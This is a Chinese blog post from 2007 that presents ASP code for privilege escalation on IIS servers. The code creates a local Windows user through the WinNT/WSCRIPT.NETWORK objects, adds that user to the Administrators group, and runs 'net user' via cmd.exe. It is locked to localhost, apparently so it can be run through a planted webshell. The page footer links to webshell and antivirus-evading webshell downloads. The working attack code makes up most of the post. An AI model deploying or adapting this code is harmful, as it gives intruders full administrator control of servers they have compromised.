用ASP代码添加超级用户——asp提权时用

原创 2007年09月18日 13:31:00
<head>.network对象脚本权限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用户:<input name="username" type="text" value="kevin1986"><br>
密码:<input name="passwd" type="password"><br>
<input type="submit" Value="添 加">
</form>

<%@codepage=936%>
<%on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你还是别买6+1了&hellip;&hellip;省下2元钱买瓶可乐也好&hellip;&hellip;"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"
else
Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "请输入输入用户名"
end if
end if
%>

 

相关文章推荐

超级IIS - Asp用户的福音

  • 2010年06月15日 11:18
  • 625KB
  • 下载

网站设计超级COOL——ASP相关编程

  • 2014年09月26日 18:27
  • 47.55MB
  • 下载

每日学习心得:CustomValidator验证控件验证用户输入的字符长度、Linq 多字段分组统计、ASP.NET后台弹出confirm对话框,然后点击确定,执行一段代码

2013-9-15 1.    CustomValidator验证控件验证用户输入的字符长度 在实际的开发中通常会遇到验证用户输入的字符长度的问题,通常的情况下,可以写一个js的脚本或者函数,在A...

ASP.NET提示框,且根据用户选择执行不同代码的实现

在网页中实现了类似WinForm的MessageBox的功能。即:代码运行到某个点后,需要给用户一个选择,是继续还是退出,并根据用户的选择继续代码或退出正在运行中的程序体。...
  • ynzdls
  • ynzdls
  • 2016年04月20日 11:05
  • 489

ASP.NET MVC4 菜鸟项目之路(一)改造示例代码扩展用户信息管理

模板创建示例项目 MVC的基础内容我就不说了,入门建议看看官方的MvcMovie示例。 提供个链接(共9篇):http://www.cnblogs.com/powertoolsteam/a...

asp.net 避免用户自定义控件的父类代码多次运行

在一个asp.net项目中,用户自定义控件是很经常使用的,一个项目中一般都会有多个用户自定义控件,而为了代码重用,通常这些控件都会继承一个父类, 一个页面还会引用多个用户自定义控件。 这种情况如果...

ASP.NET MVC4 菜鸟项目之路(一)改造示例代码扩展用户信息管理

模板创建示例项目 MVC的基础内容我就不说了,入门建议看看官方的MvcMovie示例。 提供个链接(共9篇):http://www.cnblogs.com/powertoolsteam/a...

提权漏洞集锦asp webshell

  • 2014年06月17日 08:21
  • 101KB
  • 下载

ASP.NET(aspxspy)防提权设置

防止读取注册表、运行命令、查看服务、查看进程: 打开:C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\config\web.config 找到 改为...

2016年免杀asp大马.提权防删

  • 2016年11月02日 16:03
  • 73KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:用ASP代码添加超级用户——asp提权时用
举报原因:
原因补充:

(最多只允许输入30个字)